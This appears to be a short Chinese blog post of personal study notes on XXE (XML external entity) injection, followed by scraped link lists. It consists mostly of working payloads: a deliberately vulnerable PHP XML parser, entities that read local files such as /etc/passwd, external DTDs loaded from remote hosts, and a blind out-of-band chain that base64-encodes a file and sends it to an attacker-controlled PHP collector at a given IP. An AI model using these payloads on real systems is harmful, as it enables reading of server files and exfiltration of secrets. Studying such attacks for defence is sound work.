好久没学习技术了  很多东西都忘了  复习一下

测试代码

<?php

$xml = file_get_contents("php://input");

$data = simplexml_load_string($xml);

foreach ($data as $key => $value){

    echo "you  " . $key . "is  " . $value . "<br>";

}

?>

第一种方法

<?xml version="1.0" encoding="utf-8" ?>

<!DOCTYPE a [ <!ENTITY b SYSTEM "file:///D:/123.txt"> ]>

<user>

<test>&b;</test>

</user>

第二种方法

<?xml version="1.0" encoding="utf-8" ?>

<!DOCTYPE a [ <!ENTITY % d SYSTEM "http://host/test.dtd"> %d; ]>

<user>

<test>&b;</test>

</user>

test.dtd内容是
<!ENTITY b SYSTEM "file:///etc/passwd">

第三种方法

<!DOCTYPE a SYSTEM " http://host/test.dtd">

第四种 无回显的情况 提交

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE try[
<!ENTITY % int SYSTEM "http://123.206.229.100:8888//evil.xml">
%int;
%all;
%send;
]>







服务器1.php文件




<?php file_put_contents("1.txt",$_GET['file']); ?>






服务器evil.xml文件






<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///D:/123.txt">

<!ENTITY % all "<!ENTITY % send SYSTEM 'http://xxx.xxx.xxx/1.php?file=%file;'>">




												


											
xml实体注入学习的更多相关文章
	

    
								
  1. 3. XML实体注入漏洞的利用与学习
		
    XML实体注入漏洞的利用与学习 前言 XXE Injection即XML External Entity Injection,也就是XML外部实体注入攻击.漏洞是在对非安全的外部实体数据进行处理时引发 ...
    
		
    2. 
						
  2. XML实体注入漏洞
		
    XML实体注入漏洞 测试代码1: 新建xmlget.php,复制下面代码 <?php $xml=$_GET['xml']; $data = simplexml_load_string($xml) ...
    
		
    3. 
						
  3. 小试XML实体注入攻击
		
    基础知识 XML(Extensible Markup Language)被设计用来传输和存储数据.关于它的语法,本文不准备写太多,只简单介绍一下. XML基本知识 1 2 3 4 5 <?xml ...
    
		
    4. 
						
  4. 2.XML实体注入漏洞攻与防
		
    XML实体注入基础 当允许引用外部实体时,通过构造恶意内容,可导致读取任意文件.执行系统命令.探测内网端口.攻击内网网站等危害. 简单了解XML以后,我们知道要在XML中使用特殊字符,需要使用实体字符 ...
    
		
    5. 
						
  5. Fortify漏洞之XML External Entity Injection(XML实体注入)
		
    继续对Fortify的漏洞进行总结,本篇主要针对  XML External Entity Injection(XML实体注入) 的漏洞进行总结,如下: 1.1.产生原因: XML External  ...
    
		
    6. 
						
  6. 企业安全01-Apache solr XML实体注入漏洞CVE-2017-12629
		
    Apache solr XML 实体注入漏洞CVE-2017-12629 一.简介 Apache Solr 是一个开源的搜索服务器.Solr 使用 Java 语言开发,主要基于 HTTP 和 Apac ...
    
		
    7. 
						
  7. XXE(XML External Entity attack)XML外部实体注入攻击
		
    导语 XXE:XML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击.由于程序在解析输入的XML数据时,解析了攻击者 ...
    
		
    8. 
						
  8. XML外部实体注入 安鸾 Writeup
		
    XML外部实体注入01 XML外部实体注入,简称XXE 网站URL:http://www.whalwl.host:8016/ 提示:flag文件在服务器根目录下,文件名为flag XML用于标记电子文 ...
    
		
    9. 
						
  9. PHP xml 外部实体注入漏洞学习
		
    XML与xxe注入基础知识 1.XMl定义 XML由3个部分构成,它们分别是:文档类型定义(Document Type Definition,DTD),即XML的布局语言:可扩展的样式语言(Exten ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. River Problem HDU - 3947(公式建边)
			
    River Problem Time Limit: 6000/2000 MS (Java/Others)    Memory Limit: 65536/65536 K (Java/Others)Tot ...
    
			
    2. 
						
  2. hdu 2844 Coins (多重背包+二进制优化)
			
    链接:http://acm.hdu.edu.cn/showproblem.php?pid=2844 思路:多重背包 , dp[i] ,容量为i的背包最多能凑到多少容量,如果dp[i] = i,那么代表 ...
    
			
    3. 
						
  3. MT【295】线段比的仿射变换
			
    已知$F_1,F_2$分别为椭圆$\dfrac{x^2}{4}+\dfrac{y^2}{3}=1$的左右焦点.$A,B,C$是椭圆上$x$轴上方的三点,且$AF_1//BO//CF_2$,则$\dfr ...
    
			
    4. 
						
  4. Hdoj 1086.You can Solve a Geometry Problem too 题解
			
    Problem Description Many geometry(几何)problems were designed in the ACM/ICPC. And now, I also prepare ...
    
			
    5. 
						
  5. HDU 6336 Matrix from Arrays (杭电多校4E)
			
    遇事不决先打表. 然后会发现(个屁)大的矩形是由一个2L*2L的矩形重复出现组成的然后我们就可以这个矩形分成四个点到(0, 0)点的矩形,这样问题就变成了求四个到顶点(0, 0)的矩形的面积,然后就先 ...
    
			
    6. 
						
  6. HDU6280 From Tree to Graph
			
    下午打了湘潭邀请赛,好像缓解了一下北京网络赛超强的自闭感.补一下这个图论题.(补了很久) 题意:给你一颗n节点的树,有m个操作,每次向xi和lca(xi,yi)连边,然后每次zi就是对于新的图在删除每 ...
    
			
    7. 
						
  7. hdu 3746 Cyclic Nacklace(kmp最小循环节)
			
    Problem Description CC always becomes very depressed at the end of this month, he has checked his cr ...
    
			
    8. 
						
  8. codevs1260 快餐问题
			
    题意: 一个套餐需要a个A,b个B,c个C. 你生产一个A需要t1,一个B需要t2,一个C需要t3时间. 你有n台机器.每台每天工作timei时间. 一件物品只能在一个机器上生产. 求你一天最多能生产 ...
    
			
    9. 
						
  9. [luogu3709][大爷的字符串题]
			
    题目链接 题意 一天做到两道这种题目描述如此神仙的题也是够了.真锻炼语文能力. 题目的意思其实就是,给你一个序列,然后每次询问一个区间.使得尽量按照严格上升的顺序从这个区间内取数.如果当前取得数字小于 ...
    
			
    10. 
						
  10. javascript 请求action传递中文参数乱码问题
			
    1.js $.ajaxFileUpload        (            {                url:'<%=basePath%>uploadDatFile/fil ...
    
			
    11.